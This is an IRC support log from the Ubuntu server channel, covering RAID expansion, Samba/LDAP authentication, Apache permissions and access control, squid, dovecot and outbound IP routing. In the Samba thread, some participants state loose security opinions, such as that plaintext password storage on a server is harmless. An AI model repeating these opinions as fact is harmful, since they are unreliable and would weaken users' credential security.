<pmatulis> MagicFab: thx
<eriksson25> Hi, need help. Want to know my options. Have a mdadm raid 5 array with 6*1TB disks and added 2*2tb disk. But only gained 1,5TB since the disks are difrent size. What are my options to solve this?
<patdk-wk> partition the 2tb disks as two 1tb disks :)
<eriksson25> I was thinking of that, someone told me it wouldent work.
<patdk-wk> join one partition of each into the raid5, and make a new raid1 with the other 1tb
<patdk-wk> someone is fouled
<G> yeah that'd work
<patdk-wk> remove the 1tb disks, and replace with 2tb :)
<eriksson25> =)
<patdk-wk> join all 4 new 1tb partitions to the raid5 (and loose 2 disks basically if one of those 2tb drives fail)
<eriksson25> Will I have to use lvm to add the two arrays together?
<patdk-wk> if you want to join them, yep
<patdk-wk> I personally keep mine seperate
<eriksson25> What do you meen with loosing both if one disk goes down?
<patdk-wk> if you split a 2tb drive into two 1tb partitions
<patdk-wk> then join both 1tb partitions into the raid5
<patdk-wk> you loose two raid5 disks, if that 2tb drive fails
<eriksson25> Would the raid survive it?
<patdk-wk> nope
<patdk-wk> if it was raid6, it could
<eriksson25> Or do I need to change to raid 6 for it to survive it?
<eriksson25> Can I change it with data in place?
<eriksson25> upgrade...
<patdk-wk> I'm just listing options (not how good they are) :)
<patdk-wk> I dunno
<eriksson25> ofc, thax for that =)
<patdk-wk> I haven't attempted that
<patdk-wk> someone said you could with mdadm 3.x
<patdk-wk> but not wih 2.6, that is in lucid
<patdk-wk> but I dunno how true that is
<eriksson25> I see
<patdk-wk> worst case then, get a utility bootable cd, with newer mdadm on it, convert, then use ubuntu again
<Pici> I guess I'm raid-stupid.
<eriksson25> a raid 1 with two 1tb partitions I would get 1TB storage right?
<patdk-wk> yep
<eriksson25> So total loss on my both 2tb disks is 1tb.
<eriksson25> If I would get a third 2tb disk. And make that 3*1tb partit on my old array. And another raid 5 array with 3*1TB partitions I would still only loose 1TB. And have two raid 5 arrays right?
<patdk-wk> http://www.sysresccd.org is my fav little utility iso cd
<patdk-wk> it has 3.1 mdadm, so it should be able to convert no problems
<patdk-wk> if you want to do that
<patdk-wk> I personally would just do the 1tb partitions, make a raid1, and use them as seperate disks, and when you upgrade the others, backup the data off the 1tb, expand the raid, then restore the data
<eriksson25> Well, I am remote administrating a friends server. So Guess its not that good idee =) 400km aside.
<Bondi> has anybody got openldap to work with samba for windows clients to connect?
<gathraigin> Hi all, just a quick question, I looking to setup an ubuntu server as a kvm host system, the host has a second hdd mounted as the data storage. Is it possible to access that data storage from a single or multiple kvm guests?
<teago> hello!
<incorrect> samba makes me cry
<incorrect> its so rubbish
<incorrect> there has got to be an alternative network FS that works between different systems
<giovani> haha
<giovani> sure, but they're not well-supported
<giovani> NFS, AFS/Coda
<giovani> all have pretty mediocre windows support
<giovani> and are much harder than samba to get working properly
<incorrect> giovani, i was right about the split password sync issue
<giovani> if you're using direct ldap from samba, sure
<giovani> but don't do that
<incorrect> ldap from samba? what do you mean
<uvirtbot> New bug: #634085 in vsftpd (main) "package vsftpd 2.2.2-3ubuntu6 failed to install/upgrade: subprocess installed post-installation script returned error exit status 3" [Undecided,New] https://launchpad.net/bugs/634085
<giovani> incorrect: instead of using system auth
<giovani> which you can have refer to ldap
<giovani> which is what I recommended
<incorrect> so my nsswitch looks like passwd: files ldap-samba-bridge ?
<incorrect> so everything that auths off ldap needs to find some sort of bridge method
<giovani> depends on your setup -- probably more like this -- passwd:     compat
<giovani> passwd_compat: ldap
<giovani> shadow:     compat
<giovani> shadow_compat: ldap
<incorrect> well that will break a lot of other stuff that goes direct
<giovani> break what?
<hggdh> Daviey: the rig is yours for an update (cempedak, mabolo, marula, santol)
<incorrect> well i have a number of sites going direct
<giovani> I don't know what you mean
<giovani> why would allowing PAM to use LDAP auth break applications using LDAP directly?
<incorrect> well if they change their password in ldap its going to break the samba auth having a split password
<giovani> ... not if you point samba to use PAM
<giovani> sigh
<incorrect> so this is a change in smb.conf not nsswitch
<giovani> it's both
<pmatulis> speaking of PAM, i see that common-session is called upon logout but not shutdown & reboot.  normal?
<incorrect> giovani, i don't see anyone doing anything similar so what you are suggesting
<ruben23> how to tar and  zip directory on  linux server
<patdk-wk> hmm
<eriksson25> Hi, I added 2*2tb disks to my mdadm raid 5 array with 6*1tb disks. Now I want to remove them so I can partition them and do it corect. But dont find any information on how to shrink a array and remove disks.
<patdk-wk> did you add the whole disk? or just a 2tb partition?
<eriksson25> Whole disk, stupid as I was. I think atleast. Can check.
<patdk-wk> heh, /dev/sdf vs /dev/sdf1
<eriksson25> Checking now
<eriksson25> whole disk, sdk/sdi
<patdk-wk> ya, if it was a partition, would be easy
<eriksson25> Looks like I did everything wrong =/
<patdk-wk> well, the other way to do it
<patdk-wk> is figure out exactly how much space the raid is using on the drive
<patdk-wk> make a partition (unformatted)
<patdk-wk> then do a reverse direction dd to move it
<eriksson25> The two 2TB disks shuldent be used at all right now, but not 100% sure
<SpamapS> eriksson25: if you added the completely to the raid5 .. then the stripes and everything were rearranged to use the two new disks..
<SpamapS> eriksson25: shrinking is usually a lot harder than growing. :)
<eriksson25> I know =/
<SpamapS> eriksson25: if you can tolerate downtime, you're probably better off with a full backup/restore
<patdk-wk> my wife thinks I shrink way too easily
<eriksson25> lol
 * SpamapS <barump bump CHING>
<SpamapS> heeyyy-oohhhh
<eriksson25> The problem is it feels stupid to waste like 2.5TB
<SpamapS> eriksson25: its not. disk is cheap. :)
<eriksson25> Well, sure, but not that cheap.
<eriksson25> Wasting GB is no problem, and a few hundred GB sure. Bur....
<SpamapS> what are 1TB vs. 2TB these days? $80 vs. $150?
<eriksson25> Some thing like that.
<eriksson25> Well, I will tell him to add every thing. And then next time its time to buy disk. He will have to buy disks so that he can move everything from md0 do the new md1.
<eriksson25> Think thats the easiest way.
<zul> hggdh: is there a machine on the uec testrig i can use?
<hggdh> zul: I thought you were using sapodilla/soncoya...
<eriksson25> Say buy 4 new 2*2tb. Creating a array, move everything there. Desolve the md0 and move the 2 2tb disks to the md1. And then recreate the md0 array with only 1tb disks.
<zul> hggdh: oh...i forgot about the other machine :)
<hggdh> zul: no probs, enjoy
<robbiew> kirkland: http://cloudusb.net/
<robbiew> :)
<b0gatyr> Hi everyone, I have created a subversion repo that I  need apache to have read access to it, how can I do this in ubuntu?
<RoyK> b0gatyr: that's quite well documented in the svnbook...
<RoyK> b0gatyr: you might want to create an apache virtualhost for it, but that's not very different from what's explained in the svnbook
<RoyK> also, see https://help.ubuntu.com/community/Subversion
<b0gatyr> I created a virtualhost for websvn, but websvn is complaining about not having enough rights to access my repo
<RoyK> can the www-user read (or write) those files?
<RoyK> ls -ld /path/to/repo
<RoyK> https://help.ubuntu.com/community/FilePermissions
<b0gatyr> i have drwxr-x---
<RoyK> but what user/group owns the file?
<b0gatyr> and its own by a user called "rancid"
<b0gatyr> rancid:rancid
<RoyK> do you want apache to be able to read and write from that?
<b0gatyr> yup
<b0gatyr> and rancid as well
<RoyK> chown -R www-data:www-data /path/to/repo
<RoyK> well, user rancid should use apache to connect to the repo
<RoyK> you really don't want to mix direct access and http access
<resno> a friend and i intend to setup a honey pot server for us to play with. how can i best set it up, so we can monitor everything going on with it?
<b0gatyr> RoyK: the thing is that rancid is a user that was created when I installed "rancid apt-get install rancid"
<b0gatyr> and rancid is the owner of this directory, and when rancid runs it runs as rancid
<b0gatyr> dunno if that makes any sense
<RoyK> erm
<RoyK> what does rancid do?
<RoyK> cisco config manager something?
<b0gatyr> it logs into each of my cisco routers copies configs and stores them in subversion for me to view with websvn (apache)
<b0gatyr> and compare revisions etc ..
<b0gatyr> and apache needs access to the repo which owned by rancid
<WalterN> does somebody have a dovecot.conf they want to pastebin?
<RoyK> then check out the svn tree, have rancid store the new revisions, svn ci, done
<WalterN> something screwy is going on, donno what
<RoyK> b0gatyr: as I said, mixing direct access and http access is a bad idea
<b0gatyr> RoyK: not sure if I follow, what should I do then?
<RoyK> b0gatyr: I guess you have a script doing this today?
<b0gatyr> no just followed a guide
<RoyK> just change how rancid accesses the svn repo
<b0gatyr> sorry, but how do I do that?
<RoyK> 1: make the svn repo available through apache
<RoyK> cd /path/to/workdir
<RoyK> svn co http://whatever
<RoyK> from there, run rancid
<b0gatyr> ok
<b0gatyr> i'll try doing that. Thank you
<resno> should i just use an intrusion detection system?
<b0gatyr> RoyK: one last thing, if I do "chown -R www-data:www-data /path/to/repo" you think rancid will have any problem running ?
<RoyK> resno: snort will probably work well
<RoyK> b0gatyr: if it tries to access the repo directly, yes, if it tries to use http access, no
<b0gatyr> Can I make the directory readable by both rancid and www-data?
<RoyK> [18:58]  <RoyK> https://help.ubuntu.com/community/FilePermissions
<b0gatyr> k
 * incorrect bangs his head against the wall
<incorrect> i hate samba soo much
<incorrect> maybe not samba's fault i hate it either
<RoyK> incorrect: something incorrect in the config? :)
<incorrect> RoyK, no what is getting my goat, is following, if i want to auth samba against pam i have to remove the encrypted passwords, so that is a no go
<incorrect> going to all the grief of migrating my current ldap setup is a huge pita
<RoyK> incorrect: that's by design - encrypted passwords means it's encrypted on the client side, sent encrypted to the server, and then the server cannot check that against its locally encrypted password, since that's using another algorithm
<incorrect> ... i know what the problem is
<RoyK> well, the problem's not samba's
<incorrect> like i said its not samba's fault i hate it
<RoyK> incorrect: you could setup a DC somewhere, either a samba NT4-like DC or a windoze DC and use that
<incorrect> and how would that help having split user/passwd's?
<RoyK> then you can leave the authentication to the DC
<incorrect> and migrate all my nodes over to a DC?
<incorrect> no thanks
<incorrect> buy windows
<incorrect> no thanks
<RoyK> well, you can setup samba as a DC as well
<incorrect> see about to my thoughts on that :D
<RoyK> how many samba servers?
<incorrect> well just one, its the number of users
<incorrect> and having them with two different passwords
<RoyK> well, use ldap
<RoyK> we still have to support NT4 in our network
<incorrect> ... and how do you get round the original problem even in ldap you have to store two passwords
<RoyK> now _that_ is a pain
<RoyK> incorrect: no need for two passwords if using ldap - linux can authenticate with ldap instead of native /etc/passwd etc
<incorrect> RoyK, yes i have that
<incorrect> and to get the MD4 smb password to the {SHA} ?
<patdk-wk> you have the passwords stored in ldap encrypted though
<patdk-wk> that won't work
<patdk-wk> if you use encryption on the wire, you have to store plaintext passwords
<qman__> I'd do the reverse, though
<incorrect> well i am not going to leave them unencrypted
<patdk-wk> if you store encrypted on the server, you have to pass plaintext over the wire
<qman__> md4 is not secure
<patdk-wk> heh?
<patdk-wk> there is no real insecurity in storing the passwords on your server in plaintext
<patdk-wk> unless you don't trust your server
<qman__> exactly
<patdk-wk> and since the server needs the plaintext to check it
<patdk-wk> it's still going have plaintext at some point
<qman__> store the passwords secure, transmit plaintext, and secure the network they're transmitted over
<incorrect> i don't trust people visiting the server
<RoyK> qman__: and exactly how do you do that? making a switch work as a hub merely requires an arp spoof attack
<patdk-wk> qman, heh, I wish I could get pop users to do that :)
<incorrect> so when a user does getent shadow :)
<patdk-wk> royk, easy solution, ipsec policys on all machines :)
<incorrect> that should be funny
<qman__> well, if you have rogue attackers plugging in, you've got bigger problems
<RoyK> patdk-wk: heh
<qman__> and md4 is not going to solve that
<incorrect> md4 is what smb uses to encrypt iirc
<incorrect> maybe they use something else now
<patdk-wk> it's what microsoft uses, pre-vista?
<patdk-wk> or is that what is new?
<incorrect> IIRC
<qman__> LM, NTLM, NTLM2, all easily reversed
<patdk-wk> ah, so current is md4
<qman__> you'd need to use kereberos or something else
<RoyK> kerberos is fairly safe
<RoyK> doesn't vista etc use kerberos?
<qman__> yeah, when plugged into a domain
<patdk-wk> yep
<qman__> but if they're on an XP/2003 or older non-domain network, they accept NTLM2
<RoyK> there's works in progress to make samba play AD DC
<incorrect> why waste time, why not create a new network file system
<qman__> because there are only about a billion of those already
<qman__> and windows uses SMB
<qman__> the whole point is being compatible with windows
<patdk-wk> heh? why not just use sftp?
<RoyK> incorrect: SMB2 is a new one
<RoyK> incorrect: and it's quite a bit better, especially on WAN links
<incorrect> hmm
<qman__> higher data rates
<incorrect> if it gets round this problem i will be happy
<patdk-wk> it won't
<RoyK> SMB/CIFS is _very_ chattery, which is _not_ a good idea on slow links
<patdk-wk> you can't encrypt the password with a one way hash over the wire and on the server both, at the same time
<RoyK> patdk-wk: you can, if they use the same hash
<patdk-wk> unless you do it the microsft way, without a salt :)
<patdk-wk> then it's just a password, plaintext again, basically
<RoyK> patdk-wk: I don't get it - what does ssh do then?
<patdk-wk> ssh do when?
<RoyK> patdk-wk: what is so insecure about the M$ way of transmitting passwords?
<RoyK> for instance LM2
<patdk-wk> ntlm?
<patdk-wk> the password never changes
<patdk-wk> I can replay it
<RoyK> oh
<RoyK> ok
<RoyK> you sure?
<patdk-wk> who cares if the password you type is different
<patdk-wk> yep
<RoyK> I thought it used a challenge handshake
<patdk-wk> mschap?
<RoyK> as in 'hey, encrypt your password with 192867491283497693465
<RoyK> ntlm2
<patdk-wk> maybe for ntlm2
<patdk-wk> I don't know ntlm2 :)
<RoyK> ntlm1 is quite ancient
<RoyK> it's been 10+ years since M$ stopped using that
<patdk-wk> but that gets to the same point though
<patdk-wk> if you encrypt password with random number
<RoyK> not really
<patdk-wk> you must know the plaintext password on the server
<RoyK> no
<RoyK> you just need to encrypt the _hash_ with a random number
<patdk-wk> then how can you check it?
<patdk-wk> heh?
<patdk-wk> so your encrypting the hash with a random number
<patdk-wk> and storing the hash
<RoyK> have the hash stored at the server, ask the client to encrypt the hash
<patdk-wk> so still, I only needed to know the hash
<zorton> i'm having trouble with my qlogic fibre channel HBA.  the qla2xxx driver seems to cme up and loop is up but I don't see the scsi layer picking up on an luns
<patdk-wk> still easy to replay, just need the hash
<incorrect> my theory is that its easy to install a client on windows and get it to work than it is to work around this design flaw in smb
<qman__> SMB2 is usually about 20% faster
<incorrect> i would love to create a drbd back ended samba box that auth'd off ldap
<incorrect> that would rock
<qman__> I was at an event where the NSA demonstrated a box they brought there called brutus, which was able to decrypt NTLM2 hashes off the wire in real-time
<incorrect> right now the best i can do is a webdav system with haproxy in tcp lb mode
<qman__> while not everyone has that kind of power, it is still easy to do such a thing in a matter of hours or days
<incorrect> right well samba will just have to be its own little island of user account
<incorrect> wow i am lagged
<patdk-wk> so storing the plaintext vs hash on the server is no different
<RoyK> patdk-wk: so how does ssh solve this problem?
<patdk-wk> I never said ssh solved it
<patdk-wk> he asked for alternate filesharing methods, sftp
<RoyK> sshfs
<RoyK> perhaps
<patdk-wk> password can be encrypted with salt on server
<patdk-wk> ssh logs in via pam
<jpds> You have salt on your servers?
<patdk-wk> jpds, it keeps the humidity down :)
<jpds> I suppose it makes the chips taste better.
<zorton> make sure it's iodized salt that way you get all the minerals you need
<qman__> ssh just works around it by never transmitting over an insecure link
<qman__> it establishes a safe chennel with PKI
<qman__> the problem with NTLM2 is that there is no infrastructure, so there's no way around the problem
<qman__> domains, which have an infrastructure, use kerberos instead
<RoyK> qman__: IIRC with CIFS, all authentication is encrypted the same way as with ssh
<qman__> can't be, there's no keys
<qman__> if they do, it's with a much weaker system
<incorrect> CIFS is just an 'official' subset of the smb api
<incorrect> of CIFS's encrypted the connection then i would have no issue sending a plaintext password
<Tim_R> can somebody tell me how to remove symbolic link
<patdk-wk> rm
<Tim_R> thanks patdk-wk
<Tim_R> now I have a other question how do I get this link domain.com/squirrelmail/src/login.php back to domain.com
<mfilipe> hi! I want add an user config in my apache2, so do I add in conf.d/ or httpd.conf?
<jcastro> zul: quick link to your daily server PPAs pls?
<Tim_R> ?
<zul> jcastro: hold on
<zul> https://launchpad.net/~ubuntu-server-edgers
<jcastro> ta
<mfilipe> hi! I want add an user config in my apache2, so do I add in conf.d/ or httpd.conf?
<qman__> mfilipe, httpd.conf is only included for historical reasons, custom configs should be in logically separated files in conf.d/
<qman__> either will work, though
<qman__> it should be noted that site configuration is separate, in sites-available/
<qman__> and sites are enabled with a2ensite
<mfilipe> qman__: ok, thanks! :)
<cemc> I have an ubuntu 10.04 with squid installed. the internet is an adsl which may or may not be available at boot. squid won't start because of 'dns tests failed'. there is an option for it ( -D ), but I don't know exactly where to add it
<cemc> (I don't want to edit the init.d/ scripts if there's a better way)
<jrib> cemc: pretty sure there's no better way but reading the init.d script should make it obvious if there is or not
<cemc> hmmm
<SpamapS> cemc: /etc/default/squid may be of help
<cemc> indeed
<cemc> not really help, but after lookin in /etc/init/squid.conf, I figured it out
<cemc> there really should be a comment in /etc/default/squid
<cemc> thanks jrib and SpamapS
<jrib> cemc: ah yeah, squid probably has some configuration file.  If -D can be achieved that way, that's probably better (as SpamapS suggested)
<cemc> it actually has, but you have to look in the upstart squid conf file to know what to put in the default/squid conf file ;)
<FusionX> i was banned from #ubuntu due to my bnc's server problem (join/quit spam) while i was away. CAN THE OPS PLZ UNBAN ME?
<jrib> cemc: ah, cool
<jrib> FusionX: #ubuntu-ops
<FusionX> ok thanks
<simplexi1> :), i saw that join/quit spam..
<simplexi1> little suprised that you still use same nick
<simplexio> FusionX: on same ime ther.mention about those floodbots
<FusionX> oh no that wasn't a flood bot
<FusionX> its a bnc's server problem
<FusionX> i was away while it happened
<FusionX> i'll have to ask manually on all the 15 channels for the unban
<uvirtbot> New bug: #634338 in squid (main) "/etc/default/squid option missing in Lucid" [Undecided,New] https://launchpad.net/bugs/634338
<uvirtbot> New bug: #634359 in php5 (main) "php-pear should depend on php5-dev" [Undecided,New] https://launchpad.net/bugs/634359
<WalterN> ugh
<WalterN> I cant figure out whats wrong with dovecot/postfix
<WalterN> it will receive an email fine
<WalterN> http://pastebin.com/vwmqG8J8
<WalterN> no errors
<WalterN> but it does not saving it to the mbox file
<WalterN> http://pastebin.com/XJUkz61k is the configuration file
<WalterN> weirdness
<WalterN> what do the permissions need to be for the mbox file?
<WalterN> root:mail?
<WalterN> any ideas?
<WalterN> :/
<zoopster> WalterN: you are saying there is nothing in /var/spool/mail/server? it appears %u=server
<WalterN> yeah
<WalterN> nothing in that file
<zoopster> odd.
<WalterN> var/spool/mail just points to var/mail though
<zoopster> true
<uvirtbot> New bug: #634388 in openssh (main) ""/etc/init.d/ssh stop" doesn't stop sshd" [Undecided,New] https://launchpad.net/bugs/634388
<zoopster> I must maildir and ownership of maildir is mail:mail
<hggdh> Daviey: still there?
<WalterN> so the owner should be mail:mail?
<WalterN> right now I have it set to server:mail
<WalterN> could it be saving the mail somewhere else?
<WalterN> or is that the default location?
<uvirtbot> New bug: #634406 in mysql-dfsg-5.1 (main) "package mysql-client-5.1 5.1.41-3ubuntu12.6 failed to install/upgrade: trying to overwrite '/usr/bin/mysql', which is also in package mysql-client-core-5.1 0:5.1.41-3ubuntu12.6" [Undecided,New] https://launchpad.net/bugs/634406
 * RoyK just got a call from a friend trying to install xubuntu on an old pII with 128 megs of RAM.....
<WalterN> heh
<Daviey> hggdh, sort of
<Daviey> o/
<hggdh> heh
<hggdh> Daviey: the upgrade seems to have failed... everything is correctly upgraded (and I stopped all euca* services before upgrading)
<Daviey> hggdh, I expected it to fail TBH
<hggdh> oh
<hggdh> any specific reason?
<Daviey> hggdh, I think the db schema needs a bump
<Daviey> one moment
<Daviey> hggdh, What topology is this?
<hggdh> topo3, CLC+Walrus, CC+SC, NC
<hggdh> I see a series of 16:19:53 DEBUG [AbstractClusterMessageDispatcher:New I/O client worker #2-31] com.eucalyptus.ws.EucalyptusRemoteFault: Action:ProblemAction Code:soapenv:Sender Id:RelatesTo Error: Data element of the OM Node is NULL
<hggdh> this is a new error message for me
<Daviey> yeah.. indication of db schema issue
<Daviey> i scaratched my head for ages on that one! :)
<hggdh> not good...
<Daviey> hggdh, What machine is showing that?
<hggdh> the CLC
<nxvl> kirkland: hi! I have an issue with byobu on maverick, i just ssh'd into my machine, but one program has my machine's screen size and it doesn't fit my current terminal, in the past i used to detach and byobu -dr and worked, but now i detach and lose ssh connection
<nxvl> kirkland: is there any workaround?
<b0gatyr> can anyone point me in the right direction, trying to host two sites in apache2, but i would like the following http://ip/website1 and http://ip/website2 how can this be achieved?
<tomsdale_> I just want to add a public key to my authorized_keys file but the format seems to be differen: It starts with ---- BEGIN SSH2 PUBLIC KEY ----  then has a Comment line and no declaration as to whether it's dsa or rsa. Will it work?
<tomsdale_> b0gatyr: if they are just in an directory in the webroot you probably can use aliases in your /etc/apache2/sites-enabled/... files.
<tomsdale_> b0gatyr: Alias /website1 /var/www/website1     I wouldn't do this on a production server but I had it like this on my dev server.
<b0gatyr> tomsdale_: yes they are both inside /var/www/website1 /var/www/website2
<tomsdale_> so yeah, basically this should work. Just put the alias under the DocumentRoot line and restart apache2
<b0gatyr> why is this not recommended for production?
<b0gatyr> just curious
<tomsdale_> well, I won't consider it 'clean' :-) . I used this syntax on my development server. If you use things like url rewriting you can get into trouble if you work in a subdirectory.
<tomsdale_> you might have different requirements and it might be just fine for you.
<b0gatyr> ok, thank you.
<monokrome> How can I change the default interface to send outbound data over when I have interface aliases setup for networking on multiple IPs over the same interface?
<monokrome> IE, I have eth0 eth0:187, eth0:188, etc.
<monokrome> and I want eth0 to be the default for outbound data
<Patrickdk> hmm, you only have one interface :)
<monokrome> yes
<Patrickdk> you need to stop using ifconfig, and start using ip :)
<monokrome> and 5 interface aliases
<monokrome> ip?
<Patrickdk> ip addr show
<monokrome> well that doesn't do what I'm asking
<monokrome> I have 2 interfaces, but that's beside the point
<Patrickdk> ya, it can in an odd way
<monokrome> outbound data is being registered as coming from an alias
<Patrickdk> but what you looking for currently is probably: ip route show
<monokrome> instead of just eth0
<Patrickdk> and change the src address on those routes
<monokrome> scope global secondary eth0:191
<monokrome> the one that all outbound data is going on is secondary
<Patrickdk> secondary means nothing (except that it is an alias)
<monokrome> heh
<monokrome> brb
<monokrome> back
<monokrome> so I SSH'd onto a server on the dedicated server's local network, and it looks like I configured it right because the SSH connection was on the "primary" address
<monokrome> so I think RackSpace's router is just messing things up.
<Patrickdk> heh?
<Patrickdk> it won't matter what ip you connect to
<monokrome> what?
<Patrickdk> the only difference is what ip is used by default for outgoing connections from that server
<monokrome> yea that's what I'm talking about.
<monokrome> We have one IP that is allowed to communicate with our building from that server, but it's trying to communicate from a disallowed one.
<Patrickdk> login to the problem server
<monokrome> I am logged in
<monokrome> I am SSH'd in, and if I access a remote website - I get the wrong IP.
<monokrome> However, if I ssh to a sibling server it connects from the proper IP
<monokrome> Hence, the gateway is translating to bad IP
<Patrickdk> run this: wget -qO - http://cfaj.freeshell.org/ipaddr.cgi
<monokrome> that will get the bad IP
<Patrickdk> that is your servers issue
<Patrickdk> you need to change the default ip :)
<Patrickdk> or have whatever is using the bad ip, bind to the correct one
<monokrome> You aren't listening.
<monokrome> I just told you that
<monokrome> but if I connect to a _sibling server)
<monokrome> then it uses the good IP
<monokrome> so the router at rackspace is translating the address
<Patrickdk> heh? sibling server?
<Patrickdk> I doubt it's translating ip's
<monokrome> Yes. A server accessible on the same private network.
<Patrickdk> that is so against all internet routing stuff, unless you have a private ip block
<Patrickdk> what are your ip's for that server?
<monokrome> If local connections report Ubuntu is outgoing on the right address, but anything past the firewall is outgoing on the wrong address then NAT is translating the IP poorly.
<Patrickdk> actually, none of that matters :)
<Patrickdk> as you can have completely different ip selected for local vs nonlocal ip's
<Patrickdk> or even for just one place on the internet, vs another
<Patrickdk> in ipv6, it's actually required
<qman__> if it was the router messing things up, you'd see a lot of broken TCP conversations with tcpdump
<qman__> it's far more likely that the server is not requesting from the correct address
<monokrome> Patrickdk: I added another interface alias, and now it's using that one.
<monokrome> http://dpaste.com/241202/
<monokrome> route shows this
<monokrome> I don't know why it adds 5 identical routes to eth0. One for each interface alias?
<pittstains> does anyone know if a list exists to identify the purpose of existing user groups?
<pittstains> for instance, a fresh install gives you adm, admin, staff, etc
<pittstains> i'm looking for an equivalent of the Linux Filesystem Hierarchy, but for system groups :-D
<Tim_R> can anybody tell me how I can protect a directory on my server
<giovani> Tim_R: you're going to have to be more detailed than that -- "protect" from whom?
<Tim_R> giovani I want to protect from outside world
<Tim_R> protect a directory from the outside world
<giovani> Tim_R: I don't know what that means -- does the outside world include those with accounts on your server?
<Tim_R> like /var/www/directory
<giovani> do you have a web server serving the files in /var/www?
<Tim_R> yes I do giovani
<giovani> ok, and you don't want the webserver to serve the files in /var/www/directory?
<Tim_R> not to the outside
<giovani> I don't know what the "outside" is
<giovani> that's far too broad
<Tim_R> like people like you
<Tim_R> i want be only access internal or by ip address
<giovani> you can do that with an ".htaccess" file
<giovani> you can limit the IPs that can access that directory
<Tim_R> where do I put that at
<giovani> you put it in the directory itself
<giovani> you can google for the syntax to do what you want
<Tim_R> when I tried the .htaccess it dont work
<giovani> then you probably didn't do it properly
<giovani> or your web server is not reading the .htaccess file -- did you look in the apache/webserver logs?
<Tim_R> no I didnt
<giovani> well time to do that
<vraa> http://home.golden.net/htaccess.html  -- "Restricting by IP Address"
<vraa> http://httpd.apache.org/docs/1.3/mod/mod_access.html#allow
<Tim_R> so I place the .htaccess into that directory I want to protect correct
<giovani> yes
<Tim_R> then what after that
<giovani> ... then nothing
<Tim_R> I tried to restart apache it dont do anything
<giovani> if it's written properly, and everything is configured properly, then it works
<giovani> you don't need to restart apache
<giovani> I told you to look in the logs
<Tim_R> i dont see anything in the logs
<giovani> then it probably is written incorrectly
<giovani> paste the contents of .htaccess in a pastebin
<Tim_R> http://pastebin.com/dvvnsdaJ
<ciccioprompt> salve a tutti
<ciccioprompt> posso porre un quesito?
<giovani> Tim_R: what are the permissions of the .htaccess file?
<ciccioprompt> qualcuno sa come rilevare un periodo di inattivitÃ  del pc per farlo spegnere dopo un certo periodo di inattivitÃ ?
<Tim_R> giovani 0644
<giovani> and when you try and access this page, no authentication request comes up?  Try forcing a refresh -- sometimes it caches -- shift-f5
<Tim_R> that is correct giovani
<giovani> there must be something in the logs
<giovani> or you have .htaccess files disabled in the apache config
<Tim_R> how can i enable it then giovani
<giovani> I don't remember -- read the apache docs
<giovani> but they're enabled by default
<giovani> I'm betting there's something in the logs
<ciccioprompt> ho impostato da bio lo standby del pc dopo mezz'ora di inattivitÃ  ma non funziona
<giovani> ciccioprompt: this is an english channel
<giovani> ciccioprompt: there are channels available for other languages
<ciccioprompt> ok thanks
<Tim_R> do I have to put something into the sites-available/default
<Tim_R> ?
#ubuntu-server 2010-09-10
<Tim_R> ok
<clusty> wonder how long will it take to resize an ntfs disk from 1.2TB to 1TB
<monokrome> Depends on the disk
<monokrome> and the machine, of course
<e_t_> And how full the disk is.
<monokrome> That's what this meant: < monokrome> Depends on the disk
<e_t_> Oh. I interpreted that as disk type, rotation speed, interface, etc.
<monokrome> Yes, all of that + data.
<clusty> close to empty
<clusty> 3 disk raid 5
<monokrome> Then not too long.
<monokrome> Maybe longer if it's a raid stripe.
<monokrome> Software raid or hardware raid?
<clusty> hw
<monokrome> oh
<monokrome> Not too long.
<clusty> :D
<monokrome> Assuming it really is almost empty, and it's a decent machine
<clusty> more than decent machine, 30% ish empty
<clusty> i mean full
<monokrome> ah
<monokrome> Basically it depends on how much data needs to be physically moved
<clusty> strange thing is that last time it took like 12h
<clusty> to  move it by 2MB
<clusty> cause there is a bug in parted
<clusty> that stuff is not aligned to sector on creation
<clusty> but is alligned when moving
<monokrome> :|
<clusty> WAS bug
<clusty> the latest parted bootable CD fixes it
<arrrghhh> hey all.  trying to figure out the best way to get a random selection of music onto my SD card... what would be the best method?
<intel352> hey guys, i'm having trouble with bash history in ubuntu server
<intel352> it was working fine, but as of past day or two, history shows a ton of the same 2 commands, repeated
<intel352> ls -al (repeated many times), then exit (repeated many times0
<arrrghhh> ...and you didn't do that a whole bunch?
<intel352> negatory
<intel352> and if i type a new command, execute, then scroll back, it's not there
<intel352> so it's like a ton of the same command was recorded, then it stopped recording?
<arrrghhh> huh
<intel352> i'm going to restart, see if that clears up anything
<intel352> restart the server that is
<arrrghhh> i was going to say what's in .bash_history
<intel352> it's back up. bash history shows the same
<intel352> looks like every command, it may still be recording, but then it appends a list of commands after?
<intel352> so at least now it's recording, but then after cmd recording, appends the old junk
<arrrghhh> hrm
<arrrghhh> i don't think cron would dump crap in there...
<arrrghhh> perhaps cron jobs run as your user...?
<intel352> was at 1464 cmds, run a cmd, it increments a bit over 100 cmds :-)   using the ls -al & exit
<arrrghhh> have you checked your cron?
<intel352> possible, checking
<intel352> have svn up, rsync, and some stats tracking cmds in cron
<intel352> and this shows the same pattern after each cmd i enter, does ls -al (ad nauseum), then exit (ad nauseum)
<arrrghhh> i'm not calling you a liar
<arrrghhh> i just don't know
<arrrghhh> lol
<arrrghhh> cron was my best bet
<arrrghhh> i've never heard of that.
<intel352> what's more interesting, is .bash_history actually doesn't match history output
<intel352> history output shows the pattern i described
<intel352> bash history just shows tons of exits as remaining
<intel352> with the same timestamp
<intel352> and no new cmds logged
<intel352> it's probably a bad config setting somewhere :-\
<arrrghhh> huh
<arrrghhh> i uh... am not that much of a linux guru :P
<intel352> haha, i'm typically decent, but not a guru either :-)
<arrrghhh> i actually came in here for help on something stupid that i can't wrap my head around lol.
<intel352> hahaha
<intel352> what's your issue?
<arrrghhh> trying to figure out how to fill an sd card with random songs from my 'music' folder haha
<arrrghhh> i was hoping for a command
<arrrghhh> since all the music is on the server anyways.
<intel352> lmfao
<intel352> i would think that would be a better question for standard #ubuntu, as they'd have more experience doing media. just mention that you need a cli cmd :-)
<arrrghhh> yea
<arrrghhh> i did
<arrrghhh> and i'm learning about awk
<arrrghhh> which i've heard of before, but honestly never used.
<intel352> awk, ack (ack-grep), and sed are 3 powerful commands that are good to familiarize with
<intel352> and find
<intel352> :-)
<arrrghhh> yes
<arrrghhh> i've worked with sed
<arrrghhh> but usually when people much smarter than i give me the command lol
<intel352> i usually don't branch outside of sed's straight string replacement
<intel352> but i know it's more powerful than what i use it for :-D
<arrrghhh> oh yea.
<arrrghhh> one of the dudes i work with is a perl master.
<arrrghhh> he's saved me SO much time.
<intel352> haha, nice :-D
